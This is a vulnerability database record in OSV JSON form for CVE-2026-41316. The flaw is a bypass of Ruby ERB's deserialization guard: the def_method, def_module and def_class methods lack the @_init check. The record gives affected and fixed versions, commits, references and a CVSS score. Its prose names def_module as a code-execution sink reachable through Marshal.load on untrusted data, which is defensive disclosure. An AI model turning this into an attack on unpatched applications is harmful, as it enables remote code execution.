{"id":"CVE-2026-41316","summary":"ERB has an @_init deserialization guard bypass via def_module / def_method / def_class","details":"ERB is a templating system for Ruby. Ruby 2.7.0 (before ERB 2.2.0 was published on rubygems.org) introduced an `@_init` instance variable guard in `ERB#result` and `ERB#run` to prevent code execution when an ERB object is reconstructed via `Marshal.load` (deserialization). However, three other public methods that also evaluate `@src` via `eval()` were not given the same guard: `ERB#def_method`, `ERB#def_module`, and `ERB#def_class`. An attacker who can trigger `Marshal.load` on untrusted data in a Ruby application that has `erb` loaded can use `ERB#def_module` (zero-arg, default parameters) as a code execution sink, bypassing the `@_init` protection entirely. ERB 4.0.3.1, 4.0.4.1, 6.0.1.1, and 6.0.4 patch the issue.","aliases":["GHSA-q339-8rmv-2mhv"],"modified":"2026-06-15T12:22:58.514947158Z","published":"2026-04-24T02:35:41.160Z","related":["ALSA-2026:18030","ALSA-2026:18039","ALSA-2026:18065","ALSA-2026:20596","ALSA-2026:20606","ALSA-2026:20614","CGA-p2rw-cf3p-xf66","openSUSE-SU-2026:10609-1"],"database_specific":{"osv_generated_from":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/41xxx/CVE-2026-41316.json","cwe_ids":["CWE-693"],"cna_assigner":"GitHub_M"},"references":[{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/41xxx/CVE-2026-41316.json"},{"type":"ADVISORY","url":"https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41316"}],"affected":[{"ranges":[{"type":"GIT","repo":"https://github.com/ruby/erb","events":[{"introduced":"0"},{"fixed":"b6be29fd0e0f5089447d2f8d18140ae78258621d"},{"introduced":"08b544cdb898b7479f500480bafc1876d19f8bba"},{"fixed":"93450765b5319cfb552a3d9719df137e8fbb75e9"},{"introduced":"8626c822ea8009008fb5884cfc949cbcafbe9680"},{"fixed":"4d2b45e140044f464794c0463d838d5cb4bba96c"}],"database_specific":{"extracted_events":[{"introduced":"0"},{"fixed":"4.0.3.1"},{"last_affected":"= 4.0.4"},{"introduced":"5.0.0"},{"fixed":"6.0.1.1"},{"introduced":"6.0.2"},{"fixed":"6.0.4"}],"source":"AFFECTED_FIELD"}}],"versions":["v4.0.3","v6.0.1","v6.0.3","v6.0.0","v5.1.3","v5.1.2","v5.1.1","v5.1.0","v5.0.3","v5.0.2","v5.0.1","v5.0.0","v4.0.2","v4.0.1","v4.0.0","v3.0.0","v2.2.3","v2.2.2","v2.2.1","v2.2.0"],"database_specific":{"source":"https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2026-41316.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}]}